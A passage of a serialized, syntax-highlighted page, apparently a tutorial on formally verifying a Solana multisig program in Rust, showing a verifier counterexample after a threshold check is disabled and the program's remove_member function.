}\n",[32366],{"type":27,"tag":84,"props":32367,"children":32368},{"__ignoreMap":7},[32369,32377,32385],{"type":27,"tag":207,"props":32370,"children":32371},{"class":209,"line":210},[32372],{"type":27,"tag":207,"props":32373,"children":32374},{"style":4647},[32375],{"type":33,"value":32376},"// if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n",{"type":27,"tag":207,"props":32378,"children":32379},{"class":209,"line":244},[32380],{"type":27,"tag":207,"props":32381,"children":32382},{"style":4647},[32383],{"type":33,"value":32384},"// return err!(MsError::InvalidThreshold);\n",{"type":27,"tag":207,"props":32386,"children":32387},{"class":209,"line":270},[32388],{"type":27,"tag":207,"props":32389,"children":32390},{"style":4647},[32391],{"type":33,"value":32392},"// }\n",{"type":27,"tag":36,"props":32394,"children":32395},{},[32396],{"type":33,"value":32397},"And run again:",{"type":27,"tag":101,"props":32399,"children":32401},{"code":32400},"VERIFICATION:- FAILED\nVerification Time: 8.245743s\n",[32402],{"type":27,"tag":84,"props":32403,"children":32404},{"__ignoreMap":7},[32405],{"type":33,"value":32400},{"type":27,"tag":36,"props":32407,"children":32408},{},[32409],{"type":33,"value":32410},"We get the following counterexample:",{"type":27,"tag":101,"props":32412,"children":32414},{"code":32413,"language":10269,"meta":7,"className":10270,"style":7},"Account {\n account: Ms {\n threshold: 32768,\n authority_index: 1,\n transaction_index: 0,\n ms_change_index: 0,\n bump: 0,\n create_key: ...,\n allow_external_execute: false,\n keys: SparseVec {\n size: 5112,\n },\n },\n info: AccountInfo { ... },\n}\n",[32415],{"type":27,"tag":84,"props":32416,"children":32417},{"__ignoreMap":7},[32418,32429,32449,32469,32489,32509,32529,32549,32569,32589,32610,32631,32639,32647,32677],{"type":27,"tag":207,"props":32419,"children":32420},{"class":209,"line":210},[32421,32425],{"type":27,"tag":207,"props":32422,"children":32423},{"style":8920},[32424],{"type":33,"value":24420},{"type":27,"tag":207,"props":32426,"children":32427},{"style":238},[32428],{"type":33,"value":384},{"type":27,"tag":207,"props":32430,"children":32431},{"class":209,"line":244},[32432,32437,32441,32445],{"type":27,"tag":207,"props":32433,"children":32434},{"style":220},[32435],{"type":33,"value":32436}," account",{"type":27,"tag":207,"props":32438,"children":32439},{"style":226},[32440],{"type":33,"value":736},{"type":27,"tag":207,"props":32442,"children":32443},{"style":8920},[32444],{"type":33,"value":28428},{"type":27,"tag":207,"props":32446,"children":32447},{"style":238},[32448],{"type":33,"value":384},{"type":27,"tag":207,"props":32450,"children":32451},{"class":209,"line":270},[32452,32456,32460,32465],{"type":27,"tag":207,"props":32453,"children":32454},{"style":220},[32455],{"type":33,"value":31095},{"type":27,"tag":207,"props":32457,"children":32458},{"style":226},[32459],{"type":33,"value":736},{"type":27,"tag":207,"props":32461,"children":32462},{"style":232},[32463],{"type":33,"value":32464}," 32768",{"type":27,"tag":207,"props":32466,"children":32467},{"style":238},[32468],{"type":33,"value":1842},{"type":27,"tag":207,"props":32470,"children":32471},{"class":209,"line":296},[32472,32477,32481,32485],{"type":27,"tag":207,"props":32473,"children":32474},{"style":220},[32475],{"type":33,"value":32476}," authority_index",{"type":27,"tag":207,"props":32478,"children":32479},{"style":226},[32480],{"type":33,"value":736},{"type":27,"tag":207,"props":32482,"children":32483},{"style":232},[32484],{"type":33,"value":235},{"type":27,"tag":207,"props":32486,"children":32487},{"style":238},[32488],{"type":33,"value":1842},{"type":27,"tag":207,"props":32490,"children":32491},{"class":209,"line":445},[32492,32497,32501,32505],{"type":27,"tag":207,"props":32493,"children":32494},{"style":220},[32495],{"type":33,"value":32496}," transaction_index",{"type":27,"tag":207,"props":32498,"children":32499},{"style":226},[32500],{"type":33,"value":736},{"type":27,"tag":207,"props":32502,"children":32503},{"style":232},[32504],{"type":33,"value":4680},{"type":27,"tag":207,"props":32506,"children":32507},{"style":238},[32508],{"type":33,"value":1842},{"type":27,"tag":207,"props":32510,"children":32511},{"class":209,"line":867},[32512,32517,32521,32525],{"type":27,"tag":207,"props":32513,"children":32514},{"style":220},[32515],{"type":33,"value":32516}," ms_change_index",{"type":27,"tag":207,"props":32518,"children":32519},{"style":226},[32520],{"type":33,"value":736},{"type":27,"tag":207,"props":32522,"children":32523},{"style":232},[32524],{"type":33,"value":4680},{"type":27,"tag":207,"props":32526,"children":32527},{"style":238},[32528],{"type":33,"value":1842},{"type":27,"tag":207,"props":32530,"children":32531},{"class":209,"line":892},[32532,32537,32541,32545],{"type":27,"tag":207,"props":32533,"children":32534},{"style":220},[32535],{"type":33,"value":32536}," bump",{"type":27,"tag":207,"props":32538,"children":32539},{"style":226},[32540],{"type":33,"value":736},{"type":27,"tag":207,"props":32542,"children":32543},{"style":232},[32544],{"type":33,"value":4680},{"type":27,"tag":207,"props":32546,"children":32547},{"style":238},[32548],{"type":33,"value":1842},{"type":27,"tag":207,"props":32550,"children":32551},{"class":209,"line":1475},[32552,32556,32560,32565],{"type":27,"tag":207,"props":32553,"children":32554},{"style":220},[32555],{"type":33,"value":31107},{"type":27,"tag":207,"props":32557,"children":32558},{"style":226},[32559],{"type":33,"value":736},{"type":27,"tag":207,"props":32561,"children":32562},{"style":226},[32563],{"type":33,"value":32564}," ...",{"type":27,"tag":207,"props":32566,"children":32567},{"style":238},[32568],{"type":33,"value":1842},{"type":27,"tag":207,"props":32570,"children":32571},{"class":209,"line":2065},[32572,32577,32581,32585],{"type":27,"tag":207,"props":32573,"children":32574},{"style":220},[32575],{"type":33,"value":32576}," allow_external_execute",{"type":27,"tag":207,"props":32578,"children":32579},{"style":226},[32580],{"type":33,"value":736},{"type":27,"tag":207,"props":32582,"children":32583},{"style":214},[32584],{"type":33,"value":16337},{"type":27,"tag":207,"props":32586,"children":32587},{"style":238},[32588],{"type":33,"value":1842},{"type":27,"tag":207,"props":32590,"children":32591},{"class":209,"line":2092},[32592,32597,32601,32606],{"type":27,"tag":207,"props":32593,"children":32594},{"style":220},[32595],{"type":33,"value":32596}," keys",{"type":27,"tag":207,"props":32598,"children":32599},{"style":226},[32600],{"type":33,"value":736},{"type":27,"tag":207,"props":32602,"children":32603},{"style":8920},[32604],{"type":33,"value":32605}," SparseVec",{"type":27,"tag":207,"props":32607,"children":32608},{"style":238},[32609],{"type":33,"value":384},{"type":27,"tag":207,"props":32611,"children":32612},{"class":209,"line":2130},[32613,32618,32622,32627],{"type":27,"tag":207,"props":32614,"children":32615},{"style":220},[32616],{"type":33,"value":32617}," size",{"type":27,"tag":207,"props":32619,"children":32620},{"style":226},[32621],{"type":33,"value":736},{"type":27,"tag":207,"props":32623,"children":32624},{"style":232},[32625],{"type":33,"value":32626}," 5112",{"type":27,"tag":207,"props":32628,"children":32629},{"style":238},[32630],{"type":33,"value":1842},{"type":27,"tag":207,"props":32632,"children":32633},{"class":209,"line":2168},[32634],{"type":27,"tag":207,"props":32635,"children":32636},{"style":238},[32637],{"type":33,"value":32638}," },\n",{"type":27,"tag":207,"props":32640,"children":32641},{"class":209,"line":4095},[32642],{"type":27,"tag":207,"props":32643,"children":32644},{"style":238},[32645],{"type":33,"value":32646}," },\n",{"type":27,"tag":207,"props":32648,"children":32649},{"class":209,"line":4103},[32650,32655,32659,32664,32668,32672],{"type":27,"tag":207,"props":32651,"children":32652},{"style":220},[32653],{"type":33,"value":32654}," info",{"type":27,"tag":207,"props":32656,"children":32657},{"style":226},[32658],{"type":33,"value":736},{"type":27,"tag":207,"props":32660,"children":32661},{"style":8920},[32662],{"type":33,"value":32663}," AccountInfo",{"type":27,"tag":207,"props":32665,"children":32666},{"style":238},[32667],{"type":33,"value":16862},{"type":27,"tag":207,"props":32669,"children":32670},{"style":226},[32671],{"type":33,"value":16867},{"type":27,"tag":207,"props":32673,"children":32674},{"style":238},[32675],{"type":33,"value":32676}," },\n",{"type":27,"tag":207,"props":32678,"children":32679},{"class":209,"line":4154},[32680],{"type":27,"tag":207,"props":32681,"children":32682},{"style":238},[32683],{"type":33,"value":451},{"type":27,"tag":36,"props":32685,"children":32686},{},[32687,32689,32694,32696,32701],{"type":33,"value":32688},"Here we see that the ",{"type":27,"tag":84,"props":32690,"children":32692},{"className":32691},[],[32693],{"type":33,"value":30022},{"type":33,"value":32695}," of the newly created ",{"type":27,"tag":84,"props":32697,"children":32699},{"className":32698},[],[32700],{"type":33,"value":30014},{"type":33,"value":32702}," account is larger than the number of keys (5112) which breaks our struct invariant.",{"type":27,"tag":58,"props":32704,"children":32706},{"id":32705},"verify-requirements-to-remove-a-member",[32707],{"type":33,"value":30052},{"type":27,"tag":36,"props":32709,"children":32710},{},[32711,32713,32718,32719,32724,32726,32732],{"type":33,"value":32712},"Now that we've seen both ",{"type":27,"tag":84,"props":32714,"children":32716},{"className":32715},[],[32717],{"type":33,"value":27426},{"type":33,"value":1131},{"type":27,"tag":84,"props":32720,"children":32722},{"className":32721},[],[32723],{"type":33,"value":29050},{"type":33,"value":32725}," let's take a look at the ",{"type":27,"tag":84,"props":32727,"children":32729},{"className":32728},[],[32730],{"type":33,"value":32731},"remove_member",{"type":33,"value":32733}," function:",{"type":27,"tag":101,"props":32735,"children":32737},{"code":32736,"language":10269,"meta":7,"className":10270,"style":7},"#[derive(Accounts, Debug)]\npub struct MsAuth\u003C'info> {\n #[account(mut)]\n multisig: Box\u003CAccount\u003C'info, Ms>>,\n #[account(\n mut,\n seeds = [\n b\"squad\",\n multisig.create_key.as_ref(),\n b\"multisig\"\n ], bump = multisig.bump\n )]\n pub multisig_auth: Signer\u003C'info>,\n}\n\npub fn remove_member(ctx: Context\u003CMsAuth>, old_member: Pubkey) -> Result\u003C()> {\n // if there is only one key in this multisig, reject the removal\n if ctx.accounts.multisig.keys.len() == 1 {\n return err!(MsError::CannotRemoveSoloMember);\n }\n ctx.accounts.multisig.remove_member(old_member)?;\n\n // if the number of keys is now less than the threshold, adjust it\n if ctx.accounts.multisig.keys.len() \u003C usize::from(ctx.accounts.multisig.threshold) {\n let new_threshold: u16 = ctx.accounts.multisig.keys.len().try_into().unwrap();\n ctx.accounts.multisig.change_threshold(new_threshold)?;\n }\n let new_index = ctx.accounts.multisig.transaction_index;\n ctx.accounts.multisig.set_change_index(new_index)\n}\n",[32738],{"type":27,"tag":84,"props":32739,"children":32740},{"__ignoreMap":7},[32741,32764,32792,32807,32852,32859,32871,32887,32899,32925,32933,32962,32969,33001,33008,33015,33089,33097,33157,33189,33196,33247,33254,33262,33355,33444,33498,33505,33550,33595],{"type":27,"tag":207,"props":32742,"children":32743},{"class":209,"line":210},[32744,32748,32752,32756,32760],{"type":27,"tag":207,"props":32745,"children":32746},{"style":238},[32747],{"type":33,"value":30110},{"type":27,"tag":207,"props":32749,"children":32750},{"style":8920},[32751],{"type":33,"value":30115},{"type":27,"tag":207,"props":32753,"children":32754},{"style":238},[32755],{"type":33,"value":1123},{"type":27,"tag":207,"props":32757,"children":32758},{"style":8920},[32759],{"type":33,"value":31975},{"type":27,"tag":207,"props":32761,"children":32762},{"style":238},[32763],{"type":33,"value":27530},{"type":27,"tag":207,"props":32765,"children":32766},{"class":209,"line":244},[32767,32771,32775,32780,32784,32788],{"type":27,"tag":207,"props":32768,"children":32769},{"style":214},[32770],{"type":33,"value":20967},{"type":27,"tag":207,"props":32772,"children":32773},{"style":214},[32774],{"type":33,"value":28423},{"type":27,"tag":207,"props":32776,"children":32777},{"style":8920},[32778],{"type":33,"value":32779}," MsAuth",{"type":27,"tag":207,"props":32781,"children":32782},{"style":238},[32783],{"type":33,"value":30195},{"type":27,"tag":207,"props":32785,"children":32786},{"style":8920},[32787],{"type":33,"value":30200},{"type":27,"tag":207,"props":32789,"children":32790},{"style":238},[32791],{"type":33,"value":14563},{"type":27,"tag":207,"props":32793,"children":32794},{"class":209,"line":270},[32795,32799,32803],{"type":27,"tag":207,"props":32796,"children":32797},{"style":238},[32798],{"type":33,"value":30402},{"type":27,"tag":207,"props":32800,"children":32801},{"style":214},[32802],{"type":33,"value":11009},{"type":27,"tag":207,"props":32804,"children":32805},{"style":238},[32806],{"type":33,"value":27530},{"type":27,"tag":207,"props":32808,"children":32809},{"class":209,"line":296},[32810,32815,32819,32824,32828,32832,32836,32840,32844,32848],{"type":27,"tag":207,"props":32811,"children":32812},{"style":220},[32813],{"type":33,"value":32814}," multisig",{"type":27,"tag":207,"props":32816,"children":32817},{"style":226},[32818],{"type":33,"value":736},{"type":27,"tag":207,"props":32820,"children":32821},{"style":8920},[32822],{"type":33,"value":32823}," Box",{"type":27,"tag":207,"props":32825,"children":32826},{"style":238},[32827],{"type":33,"value":9257},{"type":27,"tag":207,"props":32829,"children":32830},{"style":8920},[32831],{"type":33,"value":24420},{"type":27,"tag":207,"props":32833,"children":32834},{"style":238},[32835],{"type":33,"value":30195},{"type":27,"tag":207,"props":32837,"children":32838},{"style":8920},[32839],{"type":33,"value":30200},{"type":27,"tag":207,"props":32841,"children":32842},{"style":238},[32843],{"type":33,"value":1123},{"type":27,"tag":207,"props":32845,"children":32846},{"style":8920},[32847],{"type":33,"value":30014},{"type":27,"tag":207,"props":32849,"children":32850},{"style":238},[32851],{"type":33,"value":14233},{"type":27,"tag":207,"props":32853,"children":32854},{"class":209,"line":445},[32855],{"type":27,"tag":207,"props":32856,"children":32857},{"style":238},[32858],{"type":33,"value":30212},{"type":27,"tag":207,"props":32860,"children":32861},{"class":209,"line":867},[32862,32867],{"type":27,"tag":207,"props":32863,"children":32864},{"style":214},[32865],{"type":33,"value":32866}," mut",{"type":27,"tag":207,"props":32868,"children":32869},{"style":238},[32870],{"type":33,"value":1842},{"type":27,"tag":207,"props":32872,"children":32873},{"class":209,"line":892},[32874,32878,32882],{"type":27,"tag":207,"props":32875,"children":32876},{"style":238},[32877],{"type":33,"value":30296},{"type":27,"tag":207,"props":32879,"children":32880},{"style":226},[32881],{"type":33,"value":10380},{"type":27,"tag":207,"props":32883,"children":32884},{"style":238},[32885],{"type":33,"value":32886}," [\n",{"type":27,"tag":207,"props":32888,"children":32889},{"class":209,"line":1475},[32890,32895],{"type":27,"tag":207,"props":32891,"children":32892},{"style":1325},[32893],{"type":33,"value":32894}," b\"squad\"",{"type":27,"tag":207,"props":32896,"children":32897},{"style":238},[32898],{"type":33,"value":1842},{"type":27,"tag":207,"props":32900,"children":32901},{"class":209,"line":2065},[32902,32907,32911,32916,32920],{"type":27,"tag":207,"props":32903,"children":32904},{"style":238},[32905],{"type":33,"value":32906}," multisig",{"type":27,"tag":207,"props":32908,"children":32909},{"style":226},[32910],{"type":33,"value":1041},{"type":27,"tag":207,"props":32912,"children":32913},{"style":238},[32914],{"type":33,"value":32915},"create_key",{"type":27,"tag":207,"props":32917,"children":32918},{"style":226},[32919],{"type":33,"value":1041},{"type":27,"tag":207,"props":32921,"children":32922},{"style":238},[32923],{"type":33,"value":32924},"as_ref(),\n",{"type":27,"tag":207,"props":32926,"children":32927},{"class":209,"line":2092},[32928],{"type":27,"tag":207,"props":32929,"children":32930},{"style":1325},[32931],{"type":33,"value":32932}," b\"multisig\"\n",{"type":27,"tag":207,"props":32934,"children":32935},{"class":209,"line":2130},[32936,32941,32946,32950,32954,32958],{"type":27,"tag":207,"props":32937,"children":32938},{"style":238},[32939],{"type":33,"value":32940}," ], ",{"type":27,"tag":207,"props":32942,"children":32943},{"style":220},[32944],{"type":33,"value":32945},"bump",{"type":27,"tag":207,"props":32947,"children":32948},{"style":226},[32949],{"type":33,"value":229},{"type":27,"tag":207,"props":32951,"children":32952},{"style":220},[32953],{"type":33,"value":30358},{"type":27,"tag":207,"props":32955,"children":32956},{"style":226},[32957],{"type":33,"value":1041},{"type":27,"tag":207,"props":32959,"children":32960},{"style":238},[32961],{"type":33,"value":30338},{"type":27,"tag":207,"props":32963,"children":32964},{"class":209,"line":2168},[32965],{"type":27,"tag":207,"props":32966,"children":32967},{"style":238},[32968],{"type":33,"value":30346},{"type":27,"tag":207,"props":32970,"children":32971},{"class":209,"line":4095},[32972,32976,32981,32985,32989,32993,32997],{"type":27,"tag":207,"props":32973,"children":32974},{"style":214},[32975],{"type":33,"value":28115},{"type":27,"tag":207,"props":32977,"children":32978},{"style":220},[32979],{"type":33,"value":32980}," multisig_auth",{"type":27,"tag":207,"props":32982,"children":32983},{"style":226},[32984],{"type":33,"value":736},{"type":27,"tag":207,"props":32986,"children":32987},{"style":8920},[32988],{"type":33,"value":30431},{"type":27,"tag":207,"props":32990,"children":32991},{"style":238},[32992],{"type":33,"value":30195},{"type":27,"tag":207,"props":32994,"children":32995},{"style":8920},[32996],{"type":33,"value":30200},{"type":27,"tag":207,"props":32998,"children":32999},{"style":238},[33000],{"type":33,"value":13420},{"type":27,"tag":207,"props":33002,"children":33003},{"class":209,"line":4103},[33004],{"type":27,"tag":207,"props":33005,"children":33006},{"style":238},[33007],{"type":33,"value":451},{"type":27,"tag":207,"props":33009,"children":33010},{"class":209,"line":4154},[33011],{"type":27,"tag":207,"props":33012,"children":33013},{"emptyLinePlaceholder":19},[33014],{"type":33,"value":2062},{"type":27,"tag":207,"props":33016,"children":33017},{"class":209,"line":4203},[33018,33022,33026,33031,33035,33039,33043,33047,33051,33056,33060,33065,33069,33073,33077,33081,33085],{"type":27,"tag":207,"props":33019,"children":33020},{"style":214},[33021],{"type":33,"value":20967},{"type":27,"tag":207,"props":33023,"children":33024},{"style":214},[33025],{"type":33,"value":20972},{"type":27,"tag":207,"props":33027,"children":33028},{"style":1335},[33029],{"type":33,"value":33030}," remove_member",{"type":27,"tag":207,"props":33032,"children":33033},{"style":238},[33034],{"type":33,"value":1343},{"type":27,"tag":207,"props":33036,"children":33037},{"style":220},[33038],{"type":33,"value":27552},{"type":27,"tag":207,"props":33040,"children":33041},{"style":226},[33042],{"type":33,"value":736},{"type":27,"tag":207,"props":33044,"children":33045},{"style":8920},[33046],{"type":33,"value":27561},{"type":27,"tag":207,"props":33048,"children":33049},{"style":238},[33050],{"type":33,"value":9257},{"type":27,"tag":207,"props":33052,"children":33053},{"style":8920},[33054],{"type":33,"value":33055},"MsAuth",{"type":27,"tag":207,"props":33057,"children":33058},{"style":238},[33059],{"type":33,"value":13912},{"type":27,"tag":207,"props":33061,"children":33062},{"style":220},[33063],{"type":33,"value":33064},"old_member",{"type":27,"tag":207,"props":33066,"children":33067},{"style":226},[33068],{"type":33,"value":736},{"type":27,"tag":207,"props":33070,"children":33071},{"style":8920},[33072],{"type":33,"value":28129},{"type":27,"tag":207,"props":33074,"children":33075},{"style":238},[33076],{"type":33,"value":2222},{"type":27,"tag":207,"props":33078,"children":33079},{"style":226},[33080],{"type":33,"value":8968},{"type":27,"tag":207,"props":33082,"children":33083},{"style":8920},[33084],{"type":33,"value":21038},{"type":27,"tag":207,"props":33086,"children":33087},{"style":238},[33088],{"type":33,"value":27603},{"type":27,"tag":207,"props":33090,"children":33091},{"class":209,"line":4249},[33092],{"type":27,"tag":207,"props":33093,"children":33094},{"style":4647},[33095],{"type":33,"value":33096}," // if there is only one key in this multisig, reject the removal\n",{"type":27,"tag":207,"props":33098,"children":33099},{"class":209,"line":4290},[33100,33104,33109,33113,33117,33121,33125,33129,33133,33137,33141,33145,33149,33153],{"type":27,"tag":207,"props":33101,"children":33102},{"style":376},[33103],{"type":33,"value":19556},{"type":27,"tag":207,"props":33105,"children":33106},{"style":220},[33107],{"type":33,"value":33108}," ctx",{"type":27,"tag":207,"props":33110,"children":33111},{"style":226},[33112],{"type":33,"value":1041},{"type":27,"tag":207,"props":33114,"children":33115},{"style":238},[33116],{"type":33,"value":21951},{"type":27,"tag":207,"props":33118,"children":33119},{"style":226},[33120],{"type":33,"value":1041},{"type":27,"tag":207,"props":33122,"children":33123},{"style":238},[33124],{"type":33,"value":31075},{"type":27,"tag":207,"props":33126,"children":33127},{"style":226},[33128],{"type":33,"value":1041},{"type":27,"tag":207,"props":33130,"children":33131},{"style":238},[33132],{"type":33,"value":28255},{"type":27,"tag":207,"props":33134,"children":33135},{"style":226},[33136],{"type":33,"value":1041},{"type":27,"tag":207,"props":33138,"children":33139},{"style":1335},[33140],{"type":33,"value":16416},{"type":27,"tag":207,"props":33142,"children":33143},{"style":238},[33144],{"type":33,"value":21319},{"type":27,"tag":207,"props":33146,"children":33147},{"style":226},[33148],{"type":33,"value":15856},{"type":27,"tag":207,"props":33150,"children":33151},{"style":232},[33152],{"type":33,"value":235},{"type":27,"tag":207,"props":33154,"children":33155},{"style":238},[33156],{"type":33,"value":384},{"type":27,"tag":207,"props":33158,"children":33159},{"class":209,"line":4304},[33160,33164,33168,33172,33176,33180,33185],{"type":27,"tag":207,"props":33161,"children":33162},{"style":376},[33163],{"type":33,"value":23019},{"type":27,"tag":207,"props":33165,"children":33166},{"style":1335},[33167],{"type":33,"value":30791},{"type":27,"tag":207,"props":33169,"children":33170},{"style":238},[33171],{"type":33,"value":1343},{"type":27,"tag":207,"props":33173,"children":33174},{"style":8920},[33175],{"type":33,"value":30800},{"type":27,"tag":207,"props":33177,"children":33178},{"style":226},[33179],{"type":33,"value":10768},{"type":27,"tag":207,"props":33181,"children":33182},{"style":8920},[33183],{"type":33,"value":33184},"CannotRemoveSoloMember",{"type":27,"tag":207,"props":33186,"children":33187},{"style":238},[33188],{"type":33,"value":1455},{"type":27,"tag":207,"props":33190,"children":33191},{"class":209,"line":5466},[33192],{"type":27,"tag":207,"props":33193,"children":33194},{"style":238},[33195],{"type":33,"value":10645},{"type":27,"tag":207,"props":33197,"children":33198},{"class":209,"line":5530},[33199,33203,33207,33211,33215,33219,33223,33227,33231,33235,33239,33243],{"type":27,"tag":207,"props":33200,"children":33201},{"style":220},[33202],{"type":33,"value":27495},{"type":27,"tag":207,"props":33204,"children":33205},{"style":226},[33206],{"type":33,"value":1041},{"type":27,"tag":207,"props":33208,"children":33209},{"style":238},[33210],{"type":33,"value":21951},{"type":27,"tag":207,"props":33212,"children":33213},{"style":226},[33214],{"type":33,"value":1041},{"type":27,"tag":207,"props":33216,"children":33217},{"style":238},[33218],{"type":33,"value":31075},{"type":27,"tag":207,"props":33220,"children":33221},{"style":226},[33222],{"type":33,"value":1041},{"type":27,"tag":207,"props":33224,"children":33225},{"style":1335},[33226],{"type":33,"value":32731},{"type":27,"tag":207,"props":33228,"children":33229},{"style":238},[33230],{"type":33,"value":1343},{"type":27,"tag":207,"props":33232,"children":33233},{"style":220},[33234],{"type":33,"value":33064},{"type":27,"tag":207,"props":33236,"children":33237},{"style":238},[33238],{"type":33,"value":10416},{"type":27,"tag":207,"props":33240,"children":33241},{"style":226},[33242],{"type":33,"value":10444},{"type":27,"tag":207,"props":33244,"children":33245},{"style":238},[33246],{"type":33,"value":241},{"type":27,"tag":207,"props":33248,"children":33249},{"class":209,"line":7900},[33250],{"type":27,"tag":207,"props":33251,"children":33252},{"emptyLinePlaceholder":19},[33253],{"type":33,"value":2062},{"type":27,"tag":207,"props":33255,"children":33256},{"class":209,"line":7909},[33257],{"type":27,"tag":207,"props":33258,"children":33259},{"style":4647},[33260],{"type":33,"value":33261}," // if the number of keys is now less than the threshold, adjust it\n",{"type":27,"tag":207,"props":33263,"children":33264},{"class":209,"line":7917},[33265,33269,33273,33277,33281,33285,33289,33293,33297,33301,33305,33310,33314,33318,33322,33326,33330,33334,33338,33342,33346,33350],{"type":27,"tag":207,"props":33266,"children":33267},{"style":376},[33268],{"type":33,"value":19556},{"type":27,"tag":207,"props":33270,"children":33271},{"style":220},[33272],{"type":33,"value":33108},{"type":27,"tag":207,"props":33274,"children":33275},{"style":226},[33276],{"type":33,"value":1041},{"type":27,"tag":207,"props":33278,"children":33279},{"style":238},[33280],{"type":33,"value":21951},{"type":27,"tag":207,"props":33282,"children":33283},{"style":226},[33284],{"type":33,"value":1041},{"type":27,"tag":207,"props":33286,"children":33287},{"style":238},[33288],{"type":33,"value":31075},{"type":27,"tag":207,"props":33290,"children":33291},{"style":226},[33292],{"type":33,"value":1041},{"type":27,"tag":207,"props":33294,"children":33295},{"style":238},[33296],{"type":33,"value":28255},{"type":27,"tag":207,"props":33298,"children":33299},{"style":226},[33300],{"type":33,"value":1041},{"type":27,"tag":207,"props":33302,"children":33303},{"style":1335},[33304],{"type":33,"value":16416},{"type":27,"tag":207,"props":33306,"children":33307},{"style":238},[33308],{"type":33,"value":33309},"() \u003C ",{"type":27,"tag":207,"props":33311,"children":33312},{"style":8920},[33313],{"type":33,"value":23876},{"type":27,"tag":207,"props":33315,"children":33316},{"style":226},[33317],{"type":33,"value":10768},{"type":27,"tag":207,"props":33319,"children":33320},{"style":1335},[33321],{"type":33,"value":26744},{"type":27,"tag":207,"props":33323,"children":33324},{"style":238},[33325],{"type":33,"value":1343},{"type":27,"tag":207,"props":33327,"children":33328},{"style":220},[33329],{"type":33,"value":27552},{"type":27,"tag":207,"props":33331,"children":33332},{"style":226},[33333],{"type":33,"value":1041},{"type":27,"tag":207,"props":33335,"children":33336},{"style":238},[33337],{"type":33,"value":21951},{"type":27,"tag":207,"props":33339,"children":33340},{"style":226},[33341],{"type":33,"value":1041},{"type":27,"tag":207,"props":33343,"children":33344},{"style":238},[33345],{"type":33,"value":31075},{"type":27,"tag":207,"props":33347,"children":33348},{"style":226},[33349],{"type":33,"value":1041},{"type":27,"tag":207,"props":33351,"children":33352},{"style":238},[33353],{"type":33,"value":33354},"threshold) {\n",{"type":27,"tag":207,"props":33356,"children":33357},{"class":209,"line":7926},[33358,33362,33367,33371,33375,33379,33383,33387,33391,33395,33399,33403,33407,33411,33415,33419,33423,33428,33432,33436,33440],{"type":27,"tag":207,"props":33359,"children":33360},{"style":214},[33361],{"type":33,"value":10353},{"type":27,"tag":207,"props":33363,"children":33364},{"style":220},[33365],{"type":33,"value":33366}," new_threshold",{"type":27,"tag":207,"props":33368,"children":33369},{"style":226},[33370],{"type":33,"value":736},{"type":27,"tag":207,"props":33372,"children":33373},{"style":8920},[33374],{"type":33,"value":28302},{"type":27,"tag":207,"props":33376,"children":33377},{"style":226},[33378],{"type":33,"value":229},{"type":27,"tag":207,"props":33380,"children":33381},{"style":220},[33382],{"type":33,"value":33108},{"type":27,"tag":207,"props":33384,"children":33385},{"style":226},[33386],{"type":33,"value":1041},{"type":27,"tag":207,"props":33388,"children":33389},{"style":238},[33390],{"type":33,"value":21951},{"type":27,"tag":207,"props":33392,"children":33393},{"style":226},[33394],{"type":33,"value":1041},{"type":27,"tag":207,"props":33396,"children":33397},{"style":238},[33398],{"type":33,"value":31075},{"type":27,"tag":207,"props":33400,"children":33401},{"style":226},[33402],{"type":33,"value":1041},{"type":27,"tag":207,"props":33404,"children":33405},{"style":238},[33406],{"type":33,"value":28255},{"type":27,"tag":207,"props":33408,"children":33409},{"style":226},[33410],{"type":33,"value":1041},{"type":27,"tag":207,"props":33412,"children":33413},{"style":1335},[33414],{"type":33,"value":16416},{"type":27,"tag":207,"props":33416,"children":33417},{"style":238},[33418],{"type":33,"value":21155},{"type":27,"tag":207,"props":33420,"children":33421},{"style":226},[33422],{"type":33,"value":1041},{"type":27,"tag":207,"props":33424,"children":33425},{"style":1335},[33426],{"type":33,"value":33427},"try_into",{"type":27,"tag":207,"props":33429,"children":33430},{"style":238},[33431],{"type":33,"value":21155},{"type":27,"tag":207,"props":33433,"children":33434},{"style":226},[33435],{"type":33,"value":1041},{"type":27,"tag":207,"props":33437,"children":33438},{"style":1335},[33439],{"type":33,"value":10952},{"type":27,"tag":207,"props":33441,"children":33442},{"style":238},[33443],{"type":33,"value":4301},{"type":27,"tag":207,"props":33445,"children":33446},{"class":209,"line":7934},[33447,33452,33456,33460,33464,33468,33472,33477,33481,33486,33490,33494],{"type":27,"tag":207,"props":33448,"children":33449},{"style":220},[33450],{"type":33,"value":33451}," ctx",{"type":27,"tag":207,"props":33453,"children":33454},{"style":226},[33455],{"type":33,"value":1041},{"type":27,"tag":207,"props":33457,"children":33458},{"style":238},[33459],{"type":33,"value":21951},{"type":27,"tag":207,"props":33461,"children":33462},{"style":226},[33463],{"type":33,"value":1041},{"type":27,"tag":207,"props":33465,"children":33466},{"style":238},[33467],{"type":33,"value":31075},{"type":27,"tag":207,"props":33469,"children":33470},{"style":226},[33471],{"type":33,"value":1041},{"type":27,"tag":207,"props":33473,"children":33474},{"style":1335},[33475],{"type":33,"value":33476},"change_threshold",{"type":27,"tag":207,"props":33478,"children":33479},{"style":238},[33480],{"type":33,"value":1343},{"type":27,"tag":207,"props":33482,"children":33483},{"style":220},[33484],{"type":33,"value":33485},"new_threshold",{"type":27,"tag":207,"props":33487,"children":33488},{"style":238},[33489],{"type":33,"value":10416},{"type":27,"tag":207,"props":33491,"children":33492},{"style":226},[33493],{"type":33,"value":10444},{"type":27,"tag":207,"props":33495,"children":33496},{"style":238},[33497],{"type":33,"value":241},{"type":27,"tag":207,"props":33499,"children":33500},{"class":209,"line":7943},[33501],{"type":27,"tag":207,"props":33502,"children":33503},{"style":238},[33504],{"type":33,"value":10645},{"type":27,"tag":207,"props":33506,"children":33507},{"class":209,"line":7952},[33508,33512,33517,33521,33525,33529,33533,33537,33541,33545],{"type":27,"tag":207,"props":33509,"children":33510},{"style":214},[33511],{"type":33,"value":10290},{"type":27,"tag":207,"props":33513,"children":33514},{"style":220},[33515],{"type":33,"value":33516}," 